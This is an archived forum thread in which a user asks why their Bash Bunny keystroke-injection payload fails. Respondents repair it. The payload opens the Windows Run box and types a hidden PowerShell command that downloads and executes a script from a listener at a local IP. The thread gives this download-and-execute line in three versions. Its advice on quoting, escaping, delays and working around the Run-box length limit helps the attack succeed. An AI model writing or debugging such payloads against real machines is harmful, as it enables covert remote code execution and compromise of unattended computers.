Jump to content

Problem With Custom Powershell Script?


bufferoverflow

Recommended Posts

Hey guys, So I'm trying to run a powershell script to call back to my listener, I have tried this on my Win7 Vm, and Windows 10 and both times same error.

The error I get is bash bunny starts then on the computer it only prompts the run window, but doesn't copy the script and enter it. Whats the problem?

Here is my payload.txt

ATTACKMODE HID
LED B
Q GUI r
Q DELAY 100
Q STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');
Q DELAY 500
Q ENTER
LED G

 

Thanks

Link to comment
Share on other sites

Try using parentheses around the string.

E.g.

Q STRING "powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');"

 

Link to comment
Share on other sites

Lets clean that up even better so it works and not substitute the "$"s with empty bash values.

 

Q STRING "powershell.exe -nop -w hidden -c \"\$W=new-object net.webclient;\$W.proxy=[Net.WebRequest]::GetSystemWebProxy();\$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX \$W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');\""

Think I mentioned this before when using BB to send the powershell command.

1) Encapsulate string parameter in quotes.

2) After doing this all quotes , "$"s and back slashes (\) you want to send have to be escaped with "\".

3) encapsulate the actual command string in escaped quotes so it is seen as 1 parameter argument in Windows.

The idea is to pass your powershell commands to powershell.exe as a string.

To really see what is coming out, have your payload launch notepad and type the executing string into it to see how it looks.

 

Also, it looks like you are trying to type this all out in the run command instead of dropping to cmd first.  The run command has a limit of characters that is much smaller than the command line before it truncates your input.  That maybe happening too.  You may have to put larger pauses/delays between your quack commands too.  I always test with big time delays and then adjust accordingly to smaller times depending on responses.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...